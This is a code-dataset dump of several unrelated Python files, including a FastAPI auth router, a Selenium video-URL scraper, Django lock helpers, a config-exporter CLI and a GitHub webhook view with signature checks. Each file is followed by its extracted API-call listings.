'google_auth.getCreds', ([], {}), '()\n', (7960, 7962), False, 'import google_auth\n'), ((8273, 8284), 'dateutil.relativedelta.MO', 'MO', (['lastMon'], {}), '(lastMon)\n', (8275, 8284), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, 
FR, SA\n'), ((8350, 8363), 'dateutil.relativedelta.TU', 'TU', (['otherDays'], {}), '(otherDays)\n', (8352, 8363), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8429, 8442), 'dateutil.relativedelta.WE', 'WE', (['otherDays'], {}), '(otherDays)\n', (8431, 8442), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8508, 8521), 'dateutil.relativedelta.TH', 'TH', (['otherDays'], {}), '(otherDays)\n', (8510, 8521), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8587, 8600), 'dateutil.relativedelta.FR', 'FR', (['otherDays'], {}), '(otherDays)\n', (8589, 8600), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8666, 8679), 'dateutil.relativedelta.SA', 'SA', (['otherDays'], {}), '(otherDays)\n', (8668, 8679), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8745, 8758), 'dateutil.relativedelta.SU', 'SU', (['otherDays'], {}), '(otherDays)\n', (8747, 8758), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n')] |
from fastapi import APIRouter, Depends, HTTPException, Response, status
from fastapi.security import OAuth2PasswordRequestForm
from pydantic import BaseModel
from fastapi_users import models
from fastapi_users.authentication import Authenticator, BaseAuthentication
from fastapi_users.manager import BaseUserManager, UserManagerDependency
from fastapi_users.router.common import ErrorCode, ErrorModel
class LoginBadCredentials(BaseModel):
    # Response model whose `detail` annotation carries the error code shown
    # in the /login 400 documentation (matches the OpenAPI example below).
    detail: ErrorCode.LOGIN_BAD_CREDENTIALS
class LoginUserNotVerified(BaseModel):
    # Response model whose `detail` annotation carries the error code shown
    # in the /login 400 documentation (matches the OpenAPI example below).
    detail: ErrorCode.LOGIN_USER_NOT_VERIFIED
def get_auth_router(
    backend: BaseAuthentication,
    get_user_manager: UserManagerDependency[models.UC, models.UD],
    authenticator: Authenticator,
    requires_verification: bool = False,
) -> APIRouter:
    """Generate a router with login/logout routes for an authentication backend."""
    router = APIRouter()
    # Dependency resolving the current active user; when requires_verification
    # is set, unverified users are rejected as well.
    get_current_user = authenticator.current_user(
        active=True, verified=requires_verification
    )
    # OpenAPI documentation for the /login error responses, merged with the
    # backend-specific success responses.
    login_responses = {
        status.HTTP_400_BAD_REQUEST: {
            "model": ErrorModel,
            "content": {
                "application/json": {
                    "examples": {
                        ErrorCode.LOGIN_BAD_CREDENTIALS: {
                            "summary": "Bad credentials or the user is inactive.",
                            "value": {"detail": ErrorCode.LOGIN_BAD_CREDENTIALS},
                        },
                        ErrorCode.LOGIN_USER_NOT_VERIFIED: {
                            "summary": "The user is not verified.",
                            "value": {"detail": ErrorCode.LOGIN_USER_NOT_VERIFIED},
                        },
                    }
                }
            },
        },
        **backend.get_openapi_login_responses_success(),
    }
    @router.post(
        "/login",
        name="auth:login",
        responses=login_responses,
    )
    async def login(
        response: Response,
        credentials: OAuth2PasswordRequestForm = Depends(),
        user_manager: BaseUserManager[models.UC, models.UD] = Depends(get_user_manager),
    ):
        # The same 400 is returned for bad credentials and inactive users so
        # the endpoint does not leak which of the two failed.
        user = await user_manager.authenticate(credentials)
        if user is None or not user.is_active:
            raise HTTPException(
                status_code=status.HTTP_400_BAD_REQUEST,
                detail=ErrorCode.LOGIN_BAD_CREDENTIALS,
            )
        if requires_verification and not user.is_verified:
            raise HTTPException(
                status_code=status.HTTP_400_BAD_REQUEST,
                detail=ErrorCode.LOGIN_USER_NOT_VERIFIED,
            )
        # The backend builds the concrete login response (cookie, JWT, ...).
        return await backend.get_login_response(user, response, user_manager)
    # The logout route is only registered for backends that support logout.
    if backend.logout:
        logout_responses = {
            **{
                status.HTTP_401_UNAUTHORIZED: {
                    "description": "Missing token or inactive user."
                }
            },
            **backend.get_openapi_logout_responses_success(),
        }
        @router.post("/logout", name="auth:logout", responses=logout_responses)
        async def logout(
            response: Response,
            user=Depends(get_current_user),
            user_manager: BaseUserManager[models.UC, models.UD] = Depends(
                get_user_manager
            ),
        ):
            return await backend.get_logout_response(user, response, user_manager)
    return router
| [
"fastapi.HTTPException",
"fastapi.APIRouter",
"fastapi.Depends"
] | [((884, 895), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (893, 895), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2022, 2031), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (2029, 2031), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2095, 2120), 'fastapi.Depends', 'Depends', (['get_user_manager'], {}), '(get_user_manager)\n', (2102, 2120), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2255, 2354), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': 'status.HTTP_400_BAD_REQUEST', 'detail': 'ErrorCode.LOGIN_BAD_CREDENTIALS'}), '(status_code=status.HTTP_400_BAD_REQUEST, detail=ErrorCode.\n LOGIN_BAD_CREDENTIALS)\n', (2268, 2354), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2474, 2575), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': 'status.HTTP_400_BAD_REQUEST', 'detail': 'ErrorCode.LOGIN_USER_NOT_VERIFIED'}), '(status_code=status.HTTP_400_BAD_REQUEST, detail=ErrorCode.\n LOGIN_USER_NOT_VERIFIED)\n', (2487, 2575), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((3143, 3168), 'fastapi.Depends', 'Depends', (['get_current_user'], {}), '(get_current_user)\n', (3150, 3168), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((3236, 3261), 'fastapi.Depends', 'Depends', (['get_user_manager'], {}), '(get_user_manager)\n', (3243, 3261), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n')] |
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import collections
import os
def Clear_Empty_Lines(text):
    """Rewrite the file at path `text`, removing every line that is empty
    or contains only whitespace.

    Uses context managers so the file handles are closed even if reading
    or writing raises (the original left them open in that case).
    """
    # Read lines as a list
    with open(text, "r") as fh:
        lines = fh.readlines()
    # Clear empty lines
    kept = [line for line in lines if not line.isspace()]
    # Rewrite the file
    with open(text, "w") as fh:
        fh.write("".join(kept))
def Get_Video_URL(url):
    """Open `url` in Chrome, scroll until the page stops growing, then
    return (page title, src of the element with id='mp4') as strings."""
    print("Starting...")
    print("Opening Window...")
    browser = webdriver.Chrome()
    browser.get(url)
    print("Scrolling down...")
    height = browser.execute_script("return document.documentElement.scrollHeight;")
    while True:
        previous_height = browser.execute_script("return document.documentElement.scrollHeight;")
        browser.execute_script("window.scrollTo(0, document.documentElement.scrollHeight);")
        time.sleep(2)
        height = browser.execute_script("return document.documentElement.scrollHeight;")
        if previous_height == height:
            # The page stopped growing: all lazy content has loaded.
            break
    print("Finding the urls...")
    page_title = browser.title
    # You might have to change id="mp4" to whatever the site uses
    video_src = browser.find_elements_by_xpath('//*[@id="mp4"]')[0].get_attribute("src")
    browser.quit()
    return str(page_title), str(video_src)
# Driver script: read the page URLs listed in the text file, scrape each
# one's video URL, and append "title : link" lines to <key>.txt, skipping
# links that were already recorded on a previous run.
url_dict = {'VideoURLs_1':'VideoLinks_1.txt'}
key = 'VideoURLs_1'
text = url_dict[key]
Clear_Empty_Lines(text)
# Collect the input URLs (only used for the final count).
sz = []
text_file_re = open(text, "r", encoding='utf-8')
for x in text_file_re:
    sz.append(x.strip('\n'))
text_file_re.close()
video_file_name = key+".txt"
if os.path.isfile(video_file_name):
    # Output file exists: load the links already written so they are skipped.
    already = []
    video_text_file_r = open(video_file_name, "r", encoding='utf-8')
    for x in video_text_file_r:
        already.append(x.strip('\n').split(" : ")[1])
    video_text_file_r.close()
    print("Adding the URLs...")
    text_file_r = open(text, "r", encoding='utf-8')
    n = 0
    for url in text_file_r:
        if url.strip('\n') not in already:
            title, link = Get_Video_URL(url)
            video_file = open(video_file_name, "a", encoding='utf-8')
            # NOTE(review): unlike the branch below, this write has no
            # trailing '\n', so appended entries run together — likely a bug.
            video_file.write("%s : %s" % (title, link))
            video_file.close()
            n += 1
    text_file_r.close()
    print("---------------------------------------------------")
    print("There are %d videos in total" % len(sz))
    print("There are", n, "new URLs added")
    print("---------------------------------------------------")
else:
    # First run: create the output file and scrape every URL.
    print('Creating file:', video_file_name)
    video_file = open(video_file_name, "w", encoding='utf-8')
    video_file.close()
    print("Writing the URLs...")
    text_file_r = open(text, "r", encoding='utf-8')
    n = 0
    for url in text_file_r:
        title, link = Get_Video_URL(url)
        video_file = open(video_file_name, "a", encoding='utf-8')
        video_file.write("%s : %s\n" % (title, link))
        video_file.close()
        n += 1
    text_file_r.close()
    print("---------------------------------------------------")
    print("There are %d videos in total" % len(sz))
    print("There are", n, "written")
    print("---------------------------------------------------")
print("Finished!!!")
| [
"os.path.isfile",
"selenium.webdriver.Chrome",
"time.sleep"
] | [((1636, 1667), 'os.path.isfile', 'os.path.isfile', (['video_file_name'], {}), '(video_file_name)\n', (1650, 1667), False, 'import os\n'), ((540, 558), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (556, 558), False, 'from selenium import webdriver\n'), ((910, 923), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (920, 923), False, 'import time\n')] |
import datetime
from django.utils.timezone import now
from django.db.utils import IntegrityError
from django.db import transaction
from .models import Lock
def clear_expired_locks():
    """Delete every Lock row whose expire_time is at or before now."""
    cutoff = now()
    with transaction.atomic():
        Lock.objects.filter(expire_time__lte=cutoff).delete()
def acquire_lock(lock_name, worker_name, timeout):
    """Try to take the named lock for worker_name for `timeout` seconds.

    Expired locks are purged first. Returns True on success, False when
    saving fails with IntegrityError (presumably another worker holds the
    lock via a uniqueness constraint on lock_name — confirm in the model).
    """
    clear_expired_locks()
    new_lock = Lock()
    new_lock.lock_name = lock_name
    new_lock.worker_name = worker_name
    new_lock.lock_time = now()
    new_lock.expire_time = new_lock.lock_time + datetime.timedelta(seconds=timeout)
    try:
        with transaction.atomic():
            new_lock.save()
    except IntegrityError:
        return False
    return True
def release_lock(lock_name, worker_name):
    """Release the named lock held by worker_name.

    Releasing is idempotent: returns True both when the lock row was
    deleted and when it did not exist. Expired locks are purged first.
    Any other database error propagates to the caller.
    """
    clear_expired_locks()
    try:
        lock = Lock.objects.get(lock_name=lock_name, worker_name=worker_name)
        with transaction.atomic():
            lock.delete()
        return True
    except Lock.DoesNotExist:
        return True
    # The original ended with an unreachable `return False`: every path above
    # either returns True or raises, so the dead statement was removed.
def get_lock_info(lock_name):
    """Return a dict describing the named lock, or None if no such lock exists."""
    try:
        lock = Lock.objects.get(lock_name=lock_name)
    except Lock.DoesNotExist:
        return None
    return {
        "pk": lock.pk,
        "lock_name": lock.lock_name,
        "worker_name": lock.worker_name,
        "lock_time": lock.lock_time,
        "expire_time": lock.expire_time,
    }
| [
"django.utils.timezone.now",
"datetime.timedelta",
"django.db.transaction.atomic"
] | [((200, 205), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (203, 205), False, 'from django.utils.timezone import now\n'), ((485, 490), 'django.utils.timezone.now', 'now', ([], {}), '()\n', (488, 490), False, 'from django.utils.timezone import now\n'), ((215, 235), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (233, 235), False, 'from django.db import transaction\n'), ((531, 566), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'timeout'}), '(seconds=timeout)\n', (549, 566), False, 'import datetime\n'), ((589, 609), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (607, 609), False, 'from django.db import transaction\n'), ((873, 893), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (891, 893), False, 'from django.db import transaction\n')] |
import os
from argparse import RawTextHelpFormatter, ArgumentTypeError, ArgumentParser
from cfg_exporter.const import ExportType, ExtensionType, TEMPLATE_EXTENSION
def valid_source(source):
    """argparse type-checker: the source path must exist on disk."""
    if not os.path.exists(source):
        raise ArgumentTypeError(_('the source path does not exists `{source}`').format(source=source))
    return source
def valid_export(export):
    """argparse type-checker: map an export-type name to its ExportType member."""
    try:
        # Enum lookup by name raises KeyError for unknown names.
        return ExportType[export]
    except KeyError:
        raise ArgumentTypeError(_('the export file type does not exits {export}').format(export=export))
def valid_table(row_num):
    """argparse type-checker: a strictly positive integer row number.

    Raises ArgumentTypeError when row_num is not an int literal or is < 1.
    The original validated with `assert`, which is silently stripped when
    Python runs with -O; an explicit comparison is used instead.
    """
    try:
        value = int(row_num)
    except ValueError:
        raise ArgumentTypeError(_('{row_num} is not a valid line number').format(row_num=row_num))
    if value <= 0:
        raise ArgumentTypeError(_('{row_num} is not a valid line number').format(row_num=row_num))
    return value
def valid_lang_template(lang_template):
    """argparse type callback: accept *lang_template* only when the path exists."""
    if os.path.exists(lang_template):
        return lang_template
    # Bug fix: the message placeholder is {lang_template}, but format() was
    # called with the keyword `source`, so the error path raised KeyError
    # instead of showing the intended message.
    raise ArgumentTypeError(_('the lang template path does not exists `{lang_template}`')
                            .format(lang_template=lang_template))
# Build the command-line parser for the cfg_exporter toolset. Every help
# string goes through the gettext alias `_` (installed elsewhere in the
# package), so the CLI help is translatable.
parser = ArgumentParser(description=_('Configuration table export toolset'), formatter_class=RawTextHelpFormatter)
# --- General options shared by every export type ---
base_group = parser.add_argument_group(title=_('Base options'))
base_group.add_argument('--clear_dir', default=False, action='store_true',
                        help=_('clear the output directory.'))
base_group.add_argument('--exclude_files', default=[], nargs="*",
                        help=_('specify a list of file names not to load.'))
base_group.add_argument('-e', '--export_type', type=valid_export,
                        metavar=f'[{",".join(ExportType.__members__.keys())}]',
                        help=_('specify the configuration table export type.'))
base_group.add_argument('--file_prefix', default='',
                        help=_('specify the prefix of the output filename.'))
base_group.add_argument('--force', default=False, action='store_true',
                        help=_('force all configuration tables to be generated.'))
base_group.add_argument('-o', '--output', type=str, default="",
                        help=_('specify the configuration table output path.'))
base_group.add_argument('-r', '--recursive', default=False, action='store_true',
                        help=_('recursively search the source path.'))
base_group.add_argument('--verification', default=False, action='store_true',
                        help=_('verify only the correctness of the configuration table.'))
base_group.add_argument('-s', '--source', type=valid_source, required=True,
                        help=_(
                            'specify the configuration table source path.\nsupported file types [{extensions}]').format(
                            extensions=",".join(ExtensionType.__members__.keys())))
base_group.add_argument('--template_path',
                        help=_('specify the extension template path.\n'
                               'the template name consists of the table name, export type, '
                               'and {template_extension} extension\n'
                               'e.g:\n'
                               '`item.erl.{template_extension}` `item.hrl.{template_extension}` '
                               '`item.lua.{template_extension}`\n'
                               'loads the template based on the specified export type\n'
                               'e.g:\n'
                               '`--export_type erl` templates ending with `.erl.{template_extension}` '
                               'and `.hrl.{template_extension}` will be loaded\n'
                               '`--export_type lua` templates ending with `.lua.{template_extension}` will be loaded'
                               ).format(template_extension=TEMPLATE_EXTENSION))
base_group.add_argument('--verbose', default=False, action='store_true',
                        help=_('show the details.'))
# --- Row-layout options: where each kind of row lives in a table ---
table_group = parser.add_argument_group(title=_('Table options'))
table_group.add_argument('--data_row', type=valid_table, required=True,
                         help=_('specify the start line number of the configuration table body data.'))
table_group.add_argument('--desc_row', type=valid_table,
                         help=_('specify the line number of the configuration table column description.'))
table_group.add_argument('--field_row', type=valid_table, required=True,
                         help=_('specify the line number of the configuration table field name.'))
table_group.add_argument('--rule_row', type=valid_table,
                         help=_('specify the line number of the configuration table check rule.'))
table_group.add_argument('--type_row', type=valid_table, required=True,
                         help=_('specify the line number of the configuration table data type.'))
# --- Localisation options ---
lang_group = parser.add_argument_group(title=_('Multi languages options'))
lang_group.add_argument('--lang_template', type=valid_lang_template,
                        help=_('specify the language template path.'))
lang_group.add_argument('--export_lang_template',
                        help=_('output language template.'))
# --- Per-format options ---
csv_group = parser.add_argument_group(title=_('CSV options'))
csv_group.add_argument('--csv_encoding', default='utf-8-sig', metavar='ENCODING',
                       help=_('specify the default encoding format for CSV files.\nDEFAULT UTF-8'))
erl_group = parser.add_argument_group(title=_('Erlang options'))
erl_group.add_argument('--erl_dir', default='',
                       help=_('specify output directory for where to generate the .erl.'))
erl_group.add_argument('--hrl_dir', default='',
                       help=_('specify output directory for where to generate the .hrl.'))
lua_group = parser.add_argument_group(title=_('LUA options'))
lua_group.add_argument('--lua_optimize', default=False, action='store_true',
                       help=_('remove default value fields ( store them into metatable ) '
                              'and reuse all table values to save memory'))
py_group = parser.add_argument_group(title=_('PYTHON options'))
py_group.add_argument('--py_optimize', default=False, action='store_true',
                      help=_('remove default value fields and reuse all table values to save memory'))
# Arguments are parsed eagerly at import time; the module exports only `args`.
args = parser.parse_args()
__all__ = ('args',)
| [
"os.path.exists",
"cfg_exporter.const.ExportType.__members__.keys",
"cfg_exporter.const.ExtensionType.__members__.keys"
] | [((200, 222), 'os.path.exists', 'os.path.exists', (['source'], {}), '(source)\n', (214, 222), False, 'import os\n'), ((884, 913), 'os.path.exists', 'os.path.exists', (['lang_template'], {}), '(lang_template)\n', (898, 913), False, 'import os\n'), ((1688, 1717), 'cfg_exporter.const.ExportType.__members__.keys', 'ExportType.__members__.keys', ([], {}), '()\n', (1715, 1717), False, 'from cfg_exporter.const import ExportType, ExtensionType, TEMPLATE_EXTENSION\n'), ((2836, 2868), 'cfg_exporter.const.ExtensionType.__members__.keys', 'ExtensionType.__members__.keys', ([], {}), '()\n', (2866, 2868), False, 'from cfg_exporter.const import ExportType, ExtensionType, TEMPLATE_EXTENSION\n')] |
from unittest import TestCase
import vivino.data.geojson.serialiser as ser
from vivino.data.model.winery import Winery
from shapely_geojson import Feature
from shapely.geometry import Point
import json
class TestSerialiser(TestCase):
    """Unit tests for the winery GeoJSON serialiser."""

    def test_serialise(self):
        """serialise() emits a GeoJSON Feature carrying name/count properties."""
        winery = Winery("<NAME>", 17.0118954, 45.5643442, 2)
        parsed = json.loads(ser.serialise(winery))
        self.assertEqual(parsed['type'], 'Feature')
        geometry = parsed['geometry']
        self.assertEqual(geometry['type'], 'Point')
        self.assertEqual(geometry['coordinates'][0], 45.5643442)
        self.assertEqual(geometry['coordinates'][1], 17.0118954)
        properties = parsed['properties']
        self.assertEqual(properties['name'], '<NAME>')
        self.assertEqual(properties['count'], 2)

    def test_create_feature(self):
        """create_feature() wraps the winery location in a shapely Feature/Point."""
        winery = Winery("<NAME>", 17.0118954, 45.5643442, 2)
        feature = ser.create_feature(winery)
        self.assertTrue(isinstance(feature, Feature))
        self.assertEqual(feature.properties['name'], '<NAME>')
        self.assertEqual(feature.properties['count'], 2)
        self.assertTrue(isinstance(feature.geometry, Point))
        self.assertEqual(feature.geometry.coords[0], (45.5643442, 17.0118954))
| [
"json.loads",
"vivino.data.model.winery.Winery"
] | [((372, 394), 'json.loads', 'json.loads', (['serialised'], {}), '(serialised)\n', (382, 394), False, 'import json\n'), ((308, 351), 'vivino.data.model.winery.Winery', 'Winery', (['"""<NAME>"""', '(17.0118954)', '(45.5643442)', '(2)'], {}), "('<NAME>', 17.0118954, 45.5643442, 2)\n", (314, 351), False, 'from vivino.data.model.winery import Winery\n'), ((870, 913), 'vivino.data.model.winery.Winery', 'Winery', (['"""<NAME>"""', '(17.0118954)', '(45.5643442)', '(2)'], {}), "('<NAME>', 17.0118954, 45.5643442, 2)\n", (876, 913), False, 'from vivino.data.model.winery import Winery\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[2]:
# import matplotlib.pyplot as plt
# from scipy import interpolate
import numpy as np
# step = np.array([12, 6, 4, 3, 2])
# MAP5 = np.array([0.6480, 0.6797, 0.6898, 0.6921, 0.6982])
# step_new = np.arange(step.min(), step.max(), 0.1)
# # step_new = np.arange(2, 11, 0.1)
# func = interpolate.interp1d(step, MAP5, kind='cubic', fill_value="extrapolate")
# MAP5_new = func(step_new)
# plt.figure(figsize=(10,10))
# ax1 = plt.subplot(2,1,2)
# plt.sca(ax1)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.xlabel("KEY-FRAME STEP", fontsize=16)
# plt.ylabel("MAP@5", fontsize=16)
# plt.title("MVOF STEP-MAP@5 CURVE", fontsize=16)
# plt.plot(step_new, MAP5_new, label="$MVOF\quad MAP@5$", linestyle='--')
# plt.scatter(step, MAP5, color="g")
# plt.hlines(0.7026, 13, 2, colors = "r", linestyles = "--", label="$DFF\qquad MAP@5$")
# plt.legend(loc="lower left", fontsize=16)
# ax2 = plt.subplot(2,1,1)
# plt.sca(ax2)
# the_table = plt.table(cellText=[list(np.flip(step, 0)), list(np.flip(MAP5, 0))],
# rowLabels=["STEP", "MAP@5"],
# # colLabels=list(np.flip(step, 0)),
# loc='lower center')
# the_table.set_fontsize(18)
# the_table.scale(1, 2)
# plt.axis('off')
# plt.show()
# In[4]:
import pickle

# Per-frame mean absolute magnitudes of dense optical flow vs. motion-vector
# features, plus their difference, accumulated over frames 0..601.
diffs = []
mvs = []
flows = []
for i in range(602):
    try:
        # Context managers fix the original's leaked file handles
        # (pickle.load(open(...)) never closed the files).
        with open("/home/jingtun/feat_flow_compare/flow_%06d.pkl" % i, 'rb') as flow_file:
            flow = pickle.load(flow_file)
        with open("/home/jingtun/feat_flow_compare/mv_%06d.pkl" % i, 'rb') as mv_file:
            mv = pickle.load(mv_file)
        diff = flow - mv
        diffs.append(np.mean(abs(diff)))
        mvs.append(np.mean(abs(mv)))
        flows.append(np.mean(abs(flow)))
    except Exception:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit; frames remain best-effort.
        print("not fit")
print("diff abs mean : ", np.mean(diffs))
print("mv abs mean : ", np.mean(mvs))
print("flow abs mean : ", np.mean(flows))
| [
"numpy.mean"
] | [((1794, 1808), 'numpy.mean', 'np.mean', (['diffs'], {}), '(diffs)\n', (1801, 1808), True, 'import numpy as np\n'), ((1834, 1846), 'numpy.mean', 'np.mean', (['mvs'], {}), '(mvs)\n', (1841, 1846), True, 'import numpy as np\n'), ((1874, 1888), 'numpy.mean', 'np.mean', (['flows'], {}), '(flows)\n', (1881, 1888), True, 'import numpy as np\n')] |
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import JsonResponse
from django.core.mail import BadHeaderError, EmailMessage
from django.template.loader import get_template
from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect
from django.views.decorators.csrf import csrf_exempt
from django.utils.encoding import force_bytes
import requests
import hmac
from hashlib import sha1
from ipaddress import ip_address, ip_network
from django.views.decorators.http import require_POST
from .forms import ContactForm
def Home(request):
    """Route to the English or Kannada landing page based on path/host."""
    wants_english = request.get_full_path() == "/en/" or 'www' in request.get_host()
    if wants_english:
        return redirect('olora_frontend:homeen')
    return redirect('olora_frontend:homekn')
def home_en(request):
    """Render the English landing page."""
    return render(request, 'olora_frontend/index.html')
def home_kn(request):
    """Render the Kannada landing page."""
    return render(request, 'olora_frontend/index.kn.html')
@require_POST
def contact_us(request):
    """Handle the AJAX contact form: e-mail the message and persist the form.

    Returns JSON ``{"message": "success"}`` on success and
    ``{"message": "error"}`` when the form is invalid, the request is not
    AJAX, or the outgoing mail is rejected with a bad header.
    """
    # @require_POST already guarantees request.method == 'POST', so the
    # original inner method check was redundant and has been dropped.
    form = ContactForm(request.POST)
    # NOTE(review): request.is_ajax() was removed in Django 4.0 — confirm the
    # project's Django version before upgrading.
    if form.is_valid() and request.is_ajax():
        subject = form.cleaned_data['subject']
        sender = form.cleaned_data['email']
        message = form.cleaned_data['message']
        name = form.cleaned_data['name']
        template = get_template('olora_frontend/contact_template.txt')
        context = {
            'name': name,
            'email': sender,
            'message': message
        }
        content = template.render(context)
        try:
            email = EmailMessage(
                subject,
                content,
                settings.SERVER_EMAIL,
                ['<EMAIL>'],
                headers={'Reply-To': sender}
            )
            email.send()
            form.save()
        except BadHeaderError:
            return JsonResponse({"message": "error"})
        return JsonResponse({"message": "success"})
    # Bug fix: an invalid form (or a non-AJAX request) previously fell
    # through to the success response without sending or saving anything.
    return JsonResponse({"message": "error"})
@require_POST
@csrf_exempt
def AutomateDeployment(request):
    """GitHub webhook endpoint: verify origin and signature, then dispatch.

    Two gates before any event is processed:
      1. the client IP (from X-Forwarded-For) must fall inside one of the
         CIDR blocks GitHub publishes at https://api.github.com/meta;
      2. the X-Hub-Signature header must be a valid HMAC-SHA1 of the raw
         request body keyed with ``settings.GITHUB_WEBHOOK_KEY``.
    """
    # Verify if request came from GitHub
    # NOTE(review): X-Forwarded-For can carry a comma-separated chain of
    # addresses; this assumes a single address — confirm the proxy setup.
    forwarded_for = u'{}'.format(request.META.get('HTTP_X_FORWARDED_FOR'))
    client_ip_address = ip_address(forwarded_for)
    whitelist = requests.get('https://api.github.com/meta').json()['hooks']
    for valid_ip in whitelist:
        if client_ip_address in ip_network(valid_ip):
            break
    else:
        # for/else: no whitelist entry matched the client address.
        return HttpResponseForbidden('Permission denied.')
    # Verify the request signature
    header_signature = request.META.get('HTTP_X_HUB_SIGNATURE')
    if header_signature is None:
        return HttpResponseForbidden('Permission denied.')
    sha_name, signature = header_signature.split('=')
    if sha_name != 'sha1':
        return HttpResponseServerError('Operation not supported.', status=501)
    # hmac.compare_digest gives a constant-time comparison (timing-attack safe).
    mac = hmac.new(force_bytes(settings.GITHUB_WEBHOOK_KEY), msg=force_bytes(request.body), digestmod=sha1)
    if not hmac.compare_digest(force_bytes(mac.hexdigest()), force_bytes(signature)):
        return HttpResponseForbidden('Permission denied.')
    # Process the GitHub events
    event = request.META.get('HTTP_X_GITHUB_EVENT', 'ping')
    if event == 'ping':
        return HttpResponse('pong')
    elif event == 'push':
        # Do something...
        return HttpResponse('success')
    return HttpResponse('pong')
| [
"django.shortcuts.render",
"django.http.JsonResponse",
"django.http.HttpResponse",
"django.http.HttpResponseForbidden",
"requests.get",
"ipaddress.ip_network",
"django.utils.encoding.force_bytes",
"django.shortcuts.redirect",
"django.http.HttpResponseServerError",
"django.core.mail.EmailMessage",
... | [((836, 880), 'django.shortcuts.render', 'render', (['request', '"""olora_frontend/index.html"""'], {}), "(request, 'olora_frontend/index.html')\n", (842, 880), False, 'from django.shortcuts import render, redirect\n'), ((914, 961), 'django.shortcuts.render', 'render', (['request', '"""olora_frontend/index.kn.html"""'], {}), "(request, 'olora_frontend/index.kn.html')\n", (920, 961), False, 'from django.shortcuts import render, redirect\n'), ((2237, 2262), 'ipaddress.ip_address', 'ip_address', (['forwarded_for'], {}), '(forwarded_for)\n', (2247, 2262), False, 'from ipaddress import ip_address, ip_network\n'), ((3375, 3395), 'django.http.HttpResponse', 'HttpResponse', (['"""pong"""'], {}), "('pong')\n", (3387, 3395), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((717, 750), 'django.shortcuts.redirect', 'redirect', (['"""olora_frontend:homeen"""'], {}), "('olora_frontend:homeen')\n", (725, 750), False, 'from django.shortcuts import render, redirect\n'), ((770, 803), 'django.shortcuts.redirect', 'redirect', (['"""olora_frontend:homekn"""'], {}), "('olora_frontend:homekn')\n", (778, 803), False, 'from django.shortcuts import render, redirect\n'), ((1998, 2034), 'django.http.JsonResponse', 'JsonResponse', (["{'message': 'success'}"], {}), "({'message': 'success'})\n", (2010, 2034), False, 'from django.http import JsonResponse\n'), ((2468, 2511), 'django.http.HttpResponseForbidden', 'HttpResponseForbidden', (['"""Permission denied."""'], {}), "('Permission denied.')\n", (2489, 2511), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((2660, 2703), 'django.http.HttpResponseForbidden', 'HttpResponseForbidden', (['"""Permission denied."""'], {}), "('Permission denied.')\n", (2681, 2703), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((2801, 2864), 
'django.http.HttpResponseServerError', 'HttpResponseServerError', (['"""Operation not supported."""'], {'status': '(501)'}), "('Operation not supported.', status=501)\n", (2824, 2864), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((2885, 2925), 'django.utils.encoding.force_bytes', 'force_bytes', (['settings.GITHUB_WEBHOOK_KEY'], {}), '(settings.GITHUB_WEBHOOK_KEY)\n', (2896, 2925), False, 'from django.utils.encoding import force_bytes\n'), ((3075, 3118), 'django.http.HttpResponseForbidden', 'HttpResponseForbidden', (['"""Permission denied."""'], {}), "('Permission denied.')\n", (3096, 3118), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((3252, 3272), 'django.http.HttpResponse', 'HttpResponse', (['"""pong"""'], {}), "('pong')\n", (3264, 3272), False, 'from django.http import HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\n'), ((1344, 1395), 'django.template.loader.get_template', 'get_template', (['"""olora_frontend/contact_template.txt"""'], {}), "('olora_frontend/contact_template.txt')\n", (1356, 1395), False, 'from django.template.loader import get_template\n'), ((2403, 2423), 'ipaddress.ip_network', 'ip_network', (['valid_ip'], {}), '(valid_ip)\n', (2413, 2423), False, 'from ipaddress import ip_address, ip_network\n'), ((2931, 2956), 'django.utils.encoding.force_bytes', 'force_bytes', (['request.body'], {}), '(request.body)\n', (2942, 2956), False, 'from django.utils.encoding import force_bytes\n'), ((3035, 3057), 'django.utils.encoding.force_bytes', 'force_bytes', 